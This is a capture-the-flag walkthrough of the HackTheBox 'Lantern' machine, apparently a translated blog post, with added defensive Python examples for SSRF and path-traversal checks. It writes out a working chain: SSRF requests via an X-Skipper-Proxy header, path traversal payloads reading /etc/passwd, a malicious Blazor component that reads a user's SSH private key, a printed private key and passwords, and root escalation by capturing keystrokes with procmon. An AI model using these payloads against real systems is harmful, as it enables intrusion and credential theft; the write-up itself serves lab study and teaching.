HacktheBox-Lantern

Information Gathering

```
start infoscan
10.10.11.29:22 open
10.10.11.29:80 open
10.10.11.29:3000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://10.10.11.29:3000 code:200 len:2832 title:None
[*] WebTitle http://10.10.11.29 code:302 len:225 title:Redirecting... 跳转url: http://lantern.htb/
```

Add the host to /etc/hosts.
Fingerprint the site with whatweb; this reveals a Skipper Proxy.

```bash
whatweb http://lantern.htb -v
```

[screenshot: Clip_2024-08-21_15-50-34.png]
On port 80, the /vacancies route lets you upload a PDF file, but that does not seem to lead anywhere.
Port 3000 is an admin back end.
[screenshot: Clip_2024-08-21_15-17-18.png]
While looking at the back end, you can see that port 3000 has a route that opens a WebSocket: /_blazor
You can also notice where the port 3000 back end references its JS source files:
[screenshot: Clip_2024-08-21_15-53-07.png]

SSRF .Net

X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)

Port 80 is vulnerable to SSRF.

```http
GET /_framework/blazor.boot.json HTTP/1.1
Host: lantern.htb
X-Skipper-Proxy: http://127.0.0.1:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
```
Response:

```json
{
  "cacheBootResources": true,
  "config": [ ],
  "debugBuild": true,
  "entryAssembly": "InternaLantern",
  "icuDataMode": 0,
  "linkerEnabled": false,
  "resources": {
    "assembly": {
      ...
    },
    "extensions": null,
    "lazyAssembly": null,
    "libraryInitializers": null,
    "pdb": {
      "InternaLantern.pdb": "sha256-E8WICkNg65vorw8OEDOe6K9nJxL0QSt1S4SZoX5rTOY="
    "runtime": {
      "dotnet.timezones.blat": "sha256-KsGUR9nqtXb3Hy6IrNlnc1HoSS+AFlsXTX9rq4oChtA=",
      "icudt.dat": "sha256-Zuq0dWAsBm6\/2lSOsz7+H9PvFaRn61KIXHMMwXDfvyE=",
      "icudt_CJK.dat": "sha256-WPyI4hWDPnOw62Nr27FkzGjdbucZnQD+Ph+GOPhAedw=",
      "icudt_EFIGS.dat": "sha256-4RwaPx87Z4dvn77ie\/ro3\/QzyS+\/gGmO3Y\/0CSAXw4k=",
      "icudt_no_CJK.dat": "sha256-OxylFgLJlFqixsj+nLxYVsv5iZLvfIKMpLf9hrWaChA=",
      "dotnet.wasm": "sha256-JlqjjT2GZWeJko9+pitVfjjmJeEbi4AibzTQr5zTISo=",
      "dotnet..lzvsyl6wav.js": "sha256-6AcYHsbEEdBjeNDUUvrQZuRqASd62mZgQgxz4uzTVGU="
    "satelliteResources": null
  }
}
```
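What makes this header dangerous is that the proxy forwards to whatever target the client names in it, so a request that looks like it is for lantern.htb is actually answered by the service on 127.0.0.1:5000. As an added illustration (not code from the original post or from the Skipper project), this is the deny-by-default check a forwarding proxy needs before honouring a client-supplied target; the allowlisted upstream name backend.internal.example is a made-up placeholder:

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical allowlist for this example: the only upstream the proxy may reach.
ALLOWED_HOSTS = {"backend.internal.example"}
ALLOWED_SCHEMES = {"http", "https"}
PROXY_HEADER = "X-Skipper-Proxy"


def classify_proxy_target(url, allowed_hosts=ALLOWED_HOSTS):
    """Return (allowed, reason) for a client-supplied forwarding target.

    Deny by default: only http(s) URLs whose host name is on the allowlist pass.
    Literal IP addresses are never forwarded; loopback, private, link-local and
    unspecified ranges are reported explicitly because those are the targets an
    SSRF attempt reaches for.
    """
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not permitted"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # not a literal address in a form ipaddress accepts
    if ip is not None:
        if (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_unspecified or ip.is_multicast or ip.is_reserved):
            return False, f"literal address {ip} points inside the host or network"
        return False, "literal addresses are not allowlisted"
    if host.lower() not in allowed_hosts:
        return False, f"host {host!r} not on the allowlist"
    return True, "ok"


def should_forward(headers, allowed_hosts=ALLOWED_HOSTS):
    """Decide for one request's headers (a dict) whether the proxy target may be honoured.

    A request without the header is fine: there is nothing client-controlled to check.
    """
    target = headers.get(PROXY_HEADER)
    if target is None:
        return True, "no proxy target supplied"
    return classify_proxy_target(target, allowed_hosts)


if __name__ == "__main__":
    # Constructed samples, including the header value from the request above.
    for value in ("http://127.0.0.1:5000", "http://[::1]:5000/",
                  "http://169.254.169.254/latest/", "http://127.1/",
                  "http://backend.internal.example/api", "file:///etc/passwd"):
        print(f"{value:40} -> {classify_proxy_target(value)}")
```

Host names are compared against the allowlist rather than resolved, so an allowlisted name that later resolves to a loopback or private address still needs the resolved address checked at connect time. Numeric forms that Python's ipaddress does not accept (the shortened 127.1, for instance) fall through to the host-name branch and are denied because they are not on the allowlist, which is the point of denying by default.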

Then download InternaLantern.dll (send the request in Burp first, then use Burp's "open in browser" feature to fetch it).

```http
GET /_framework/InternaLantern.dll HTTP/1.1
X-Skipper-Proxy: http://127.0.0.1:5000
Host: lantern.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
```

Then decompile the DLL.

Tools: GitHub - dnSpy/dnSpy: .NET debugger and assembly editor, and JetBrains dotPeek.

Not sure whether it was something on my side, but the decompiled output differs between dnSpy and dotPeek; in dotPeek several base64-encoded strings can be found, under InternaLanding.Pages/Internal.
[screenshot: Clip_2024-08-21_16-14-34.png]
Decoding the base64 gives:

```
System administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22. Ask to change after first login!
```

admin:AJbFA_Q@925p9ap#22
By the way, there is a path traversal here:

```
/PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd
```

And there is a file upload here:
[screenshot: Clip_2024-08-21_16-20-02.png]

Setting Up the .NET Environment

```bash
sudo apt install dotnet-sdk-6.0
# -n names the project (the original used -c, which dotnet new does not accept).
# A class library (dotnet new classlib -n test) avoids the "no Main method" build
# error a console project gives when Program.cs only defines a class.
dotnet new console -n test
cd test
dotnet add package Microsoft.AspNetCore.Components --version 6.0.0
```

Then edit Program.cs:

```csharp
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;

namespace test
{
    public class Component : ComponentBase
    {
        protected override void BuildRenderTree(RenderTreeBuilder builder)
        {
            base.BuildRenderTree(builder);

            // Read file content
            string file = File.ReadAllText("/home/tomas/.ssh/id_rsa"); //ssh key
            builder.AddContent(0, file);
        }
    }
}
```
```bash
dotnet build test.csproj -c Release
```

But I kept getting errors here... so here is one that someone else compiled.

HackTheBox/lantern.htb/sedlyfx.dll at main · architmadankar/HackTheBox

Upload the binary.
[screenshot: Clip_2024-08-21_17-17-01.png]
Install a Burp extension: Blazor Traffic Processor
[screenshot: Clip_2024-08-21_17-31-34.png]
[screenshot: Clip_2024-08-21_17-32-03.png]

```json
[{
  "Target": "BeginInvokeDotNetFromJS",
  "Headers": 0,
  "Arguments": [
    "2",
    "null",
    "NotifyChange",
    2,
    [[{
      "blob": {},
      "size": 5120,
      "name": "sedlyfx.dll",
      "id": 1,
      "lastModified": "2024-08-21T09:12:40.765Z",
      "contentType": "application/x-msdownload"
    }]]
  ],
  "MessageType": 1
}]
```

Change the file name to: ../../../../../../opt/components/sedlyf.dll
[screenshot: Clip_2024-08-21_17-35-35.png]
Then search for sedlyf under "Choose module":
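Both traversals on this box (the lang/ext parameters of /PrivacyAndPolicy and the upload name rewritten to ../../../../../../opt/components/sedlyf.dll) come from joining a client-supplied string onto a server directory. As an added example, not code from the post or from the Lantern application, these are the two checks that close them; the directories /srv/uploads and /srv/app/i18n and the policy.<lang>.<ext> file naming are assumptions made for the example:

```python
import posixpath
import re
from pathlib import PurePosixPath

UPLOAD_ROOT = "/srv/uploads"     # hypothetical upload storage directory
LANG_ROOT = "/srv/app/i18n"      # hypothetical directory holding the policy texts
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def safe_join(root, user_path):
    """Join user_path under root; return the normalised path, or None if it escapes root.

    posixpath.join replaces root entirely when user_path is absolute, and normpath
    collapses any ../ segments, so the containment test below sees the real target.
    """
    root_abs = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_abs, user_path))
    # The trailing "/" stops "/srv/uploads-other" from passing as "inside" /srv/uploads.
    if candidate == root_abs or candidate.startswith(root_abs + "/"):
        return candidate
    return None


def stored_upload_path(client_filename):
    """Hardened form of the upload: the post shows the server joining the client's
    name (with ../ segments) onto its components directory. Here only the final
    path component is kept and it must match a strict character pattern."""
    base = PurePosixPath(client_filename).name   # drops every directory part, ../ included
    if not SAFE_NAME.match(base):                # rejects "", ".", "..", hidden and odd names
        return None
    return safe_join(UPLOAD_ROOT, base)


def policy_file_path(lang, ext):
    """Hardened form of /PrivacyAndPolicy?lang=..&ext=..: both values are validated
    against a closed pattern before they are used to build a file name, and the
    result still has to stay below LANG_ROOT."""
    if not re.fullmatch(r"[a-z]{2}(-[A-Z]{2})?", lang):
        return None
    if not re.fullmatch(r"[a-z0-9]{1,8}", ext):
        return None
    return safe_join(LANG_ROOT, f"policy.{lang}.{ext}")


if __name__ == "__main__":
    # The two client-supplied values seen in the post, then a benign one each.
    print(stored_upload_path("../../../../../../opt/components/sedlyf.dll"))
    print(stored_upload_path("sedlyfx.dll"))
    print(policy_file_path("../../../../../../", "./etc/passwd"))
    print(policy_file_path("en", "txt"))
```

Keeping only the base name means a traversal attempt is stored as an ordinary file under the upload root rather than landing in /opt/components; if the application would rather refuse such names outright, return None whenever PurePosixPath(client_filename).name differs from client_filename.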

```
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
```

Then fix the key's permissions and connect:

```bash
chmod 600 id_rsa
ssh -i id_rsa tomas@lantern.htb
```

[screenshot: Clip_2024-08-21_17-41-01.png]

PE Root procmon

Check the mail:

```
tomas@lantern:~$ cat /var/mail/$(whoami)
From hr@lantern.htb Mon Jan 1 12:00:00 2023
Subject: Welcome to Lantern!

Hi Tomas,

Congratulations on joining the Lantern team as a Linux Engineer! We're thrilled to have you on board.

While we're setting up your new account, feel free to use the access and toolset of our previous team member. Soon, you'll have all the access you need.

Our admin is currently automating processes on the server. Before global testing, could you check out his work in /root/automation.sh? Your insights will be valuable.

Exciting times ahead!

Best.
```

As requested, try to view /root/automation.sh, but there is no permission to read it.

```
tomas@lantern:~$ sudo -l
Matching Defaults entries for tomas on lantern:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User tomas may run the following commands on lantern:
    (ALL : ALL) NOPASSWD: /usr/bin/procmon
```

Checking the process list, the script is currently open in nano:

```
tomas@lantern:~$ ps -aux | grep automation
root         838  0.0  0.1   7272  4044 pts/0    Ss+  09:35   0:00 nano /root/automation.sh
tomas       1447  0.0  0.0   6612  2244 pts/1    S+   09:37   0:00 grep --color=auto automation
```

The only thing we have sudo rights for is /usr/bin/procmon.

Looked it up, but found nothing.

```bash
sudo /usr/bin/procmon -p <Automation PID> -e write
```

Wait 5 minutes, press F6 to save the output and F9 to quit.
Or use a script:

```bash
#!/bin/bash

OLD_PID=$(ps -ef | grep -i nano | grep -v grep | awk '{print $2}')

while true; do
    NEWPID=$(ps -ef | grep -i nano | grep -v grep | awk '{print $2}')

    if [ "$OLD_PID" != "$NEWPID" ] && [[ -n "$NEWPID" ]]; then
        echo "We have a new PID! Old PID: $OLD_PID, New PID: $NEWPID"
        OLD_PID=$NEWPID
        sudo /usr/bin/procmon -p $NEWPID -e write -c nano$NEWPID.out
    fi

    sleep 5
done
```

Then copy the result out with scp.

```bash
scp -i id_rsa tomas@lantern.htb:/home/tomas/procmon_2024-08-21_09:46:29.db nano.out
```

procmon saves its output as SQLite, so analyze it with sqlite3:

```
sqlite3 nano.out
sqlite> .output out.txt
sqlite> SELECT hex(substr(arguments, 9, resultcode)) FROM ebpf WHERE resultcode > 0 ORDER BY timestamp;
```

This selects the rows of the ebpf table that match the condition (successful writes), takes resultcode bytes starting at offset 9 of the arguments column, returns them as hex, and orders the rows by timestamp.
Next, convert the hex to ASCII and then deal with the escape sequences:

```python
import binascii

# Read the content from out.txt
with open('out.txt', 'r') as file:
    hex_data = file.read().strip().replace('\n', '')

# Convert hex data to binary
binary_data = binascii.unhexlify(hex_data)

# Decode the binary data to a string
try:
    decoded_string = binary_data.decode('utf-8', errors='replace')
except UnicodeDecodeError:
    decoded_string = binary_data.decode('latin1', errors='replace')

print("Decoded Data:\n")
print(decoded_string)
```

In the output you can spot:

```
echo Q 33EEddddttddww33ppMMBB | s uuddoo . //bbaacckkuupp..sshh
```

Following the pattern (the first character of a word is output followed by a space, and every later character is written twice), it can be restored to:

```
echo Q3Eddtdw3pMB | sudo ./backup.sh
```

Use the first part as the root password to log in.
[screenshot: Clip_2024-08-21_18-13-49.png]
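The post-processing above (the sqlite query that pulls the written bytes out of the ebpf table, the hex decode, and the de-doubling rule) as one added, runnable reconstruction; this is not code from the original post. It builds an in-memory table shaped like procmon's ebpf table, runs the query from the post on it, decodes the hex, strips the terminal escape sequences nano emits while redrawing, and reverses the doubled rendering. The column layout (an 8-byte prefix before the written buffer, resultcode equal to the bytes written) is an assumption read off the query, and the captured writes are constructed for the example:

```python
import binascii
import re
import sqlite3

# Constructed stand-in for the capture: each entry is one write() made by nano.
CAPTURED_WRITES = [
    b"echo Q ",
    b"\x1b[K33EEddddttddww33ppMMBB",       # erase-to-end-of-line, then text
    b" | s uuddoo . ",
    b"//bbaacckkuupp..sshh\x1b[1;1H",      # text, then a cursor-positioning sequence
]

QUERY = ("SELECT hex(substr(arguments, 9, resultcode)) FROM ebpf "
         "WHERE resultcode > 0 ORDER BY timestamp")


def build_sample_db():
    """In-memory table with the columns the query relies on (assumed layout)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ebpf (timestamp INTEGER, arguments BLOB, resultcode INTEGER)")
    prefix = (1).to_bytes(8, "little")   # assumed 8-byte prefix (fd 1) before the buffer
    for ts, buf in enumerate(CAPTURED_WRITES, start=1):
        db.execute("INSERT INTO ebpf VALUES (?, ?, ?)", (ts, prefix + buf, len(buf)))
    # A failed write (resultcode <= 0) must be skipped by the WHERE clause.
    db.execute("INSERT INTO ebpf VALUES (?, ?, ?)", (0, prefix + b"junk", -1))
    return db


def dump_hex_rows(db):
    """The same rows sqlite3's .output would have written to out.txt, one per line."""
    return [row[0] for row in db.execute(QUERY)]


def hex_rows_to_text(rows):
    """Concatenate the hex lines and decode them, as the post's script does."""
    return binascii.unhexlify("".join(rows)).decode("utf-8", errors="replace")


ANSI_ESCAPE = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")   # CSI sequences such as ESC[K, ESC[1;1H


def strip_escapes(text):
    """Remove the terminal control sequences that sit between the typed characters."""
    return ANSI_ESCAPE.sub("", text)


def is_doubled(tok):
    """True when tok is a non-empty run of identical character pairs ("uuddoo")."""
    return (len(tok) >= 2 and len(tok) % 2 == 0
            and all(tok[i] == tok[i + 1] for i in range(0, len(tok), 2)))


def undouble(line):
    """Reverse the rendering rule seen in the capture: a word appears as its first
    character, a space, then each remaining character twice. Tokens that do not
    fit the pattern (like "echo" or "|") are passed through unchanged."""
    toks = line.split()
    out, i = [], 0
    while i < len(toks):
        tok = toks[i]
        if len(tok) == 1 and i + 1 < len(toks) and is_doubled(toks[i + 1]):
            out.append(tok + toks[i + 1][::2])   # first char + halved remainder
            i += 2
        elif is_doubled(tok):
            out.append(tok[::2])
            i += 1
        else:
            out.append(tok)
            i += 1
    return " ".join(out)


def reconstruct(db):
    """Whole pipeline: query -> hex -> text -> strip escapes -> undouble."""
    return undouble(strip_escapes(hex_rows_to_text(dump_hex_rows(db))))


if __name__ == "__main__":
    print(reconstruct(build_sample_db()))
```

Stripping the escape sequences before de-doubling matters: a redraw sequence glued to the front of a token (as in the second captured write) would otherwise stop that token from being recognised as doubled. On a real capture the rows also contain nano's screen furniture, so the reconstruction is best run line by line and read for the command that stands out.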

Beyond Root

Let's see what is under /root: automation.sh.save
[screenshot: Clip_2024-08-21_18-15-16.png]

```tcl
#!/usr/bin/expect -f

spawn nano /root/automation.sh

set text "echo Q3Eddtdw3pMB | sudo ./backup.sh"

while {1} {
    foreach char [split $text ""] {
        send "$char"
        sleep 1
    }

    send "\r"

    sleep 0.5

    for {set i 0} {$i < [string length $text]} {incr i} {
        send "\b \b" ;
    }

    send "\r"
}
```

And this is the script from earlier:

```bash
#!/bin/bash

# Directory to clean up in /opt/components
DIR_COMPONENTS="/opt/components"

# Files to exclude in /opt/components
EXCLUDE_FILES_COMPONENTS=("FileTree.dll" "FileUpload.dll" "HealthCheck.dll" "Logs.dll" "Resumes.dll")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_COMPONENTS=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_COMPONENTS[@]}")
EXCLUDE_PATTERN_COMPONENTS=${EXCLUDE_PATTERN_COMPONENTS:1} # Remove leading '|'

# Find and delete files not in the exclude list in /opt/components
/usr/bin/find "$DIR_COMPONENTS" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_COMPONENTS" | while read -r file; do
    /bin/rm -f "$file"
done

# Directory to clean up in /var/www/sites/lantern.htb/static/images
DIR_IMAGES="/var/www/sites/lantern.htb/static/images"

# Files to exclude in /var/www/sites/lantern.htb/static/images
EXCLUDE_FILES_IMAGES=("about-1.jpg" "about-2.jpg" "about.jpg" "avatar-1.jpg" "avatar-2.jpg" "avatar.jpg" "bg-bot.jpg" "bg-top.jpg" "blog-1.jpg" "blog-2.jpg" "blog-3.jpg")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_IMAGES=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_IMAGES[@]}")
EXCLUDE_PATTERN_IMAGES=${EXCLUDE_PATTERN_IMAGES:1} # Remove leading '|'

# Find and delete files not in the exclude list in /var/www/sites/lantern.htb/static/images
/usr/bin/find "$DIR_IMAGES" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_IMAGES" | while read -r file; do
    /bin/rm -f "$file"
done

/usr/sbin/service blazor-server restart
```

A cleanup script that periodically removes uploaded content.

Afterword

This one was honestly a bit confusing; for the .NET part I just used someone else's compiled exploit, and procmon was also new to me.

References

[HTB] Lantern
HackTheBox/lantern.htb/README.md at main · architmadankar/HackTheBox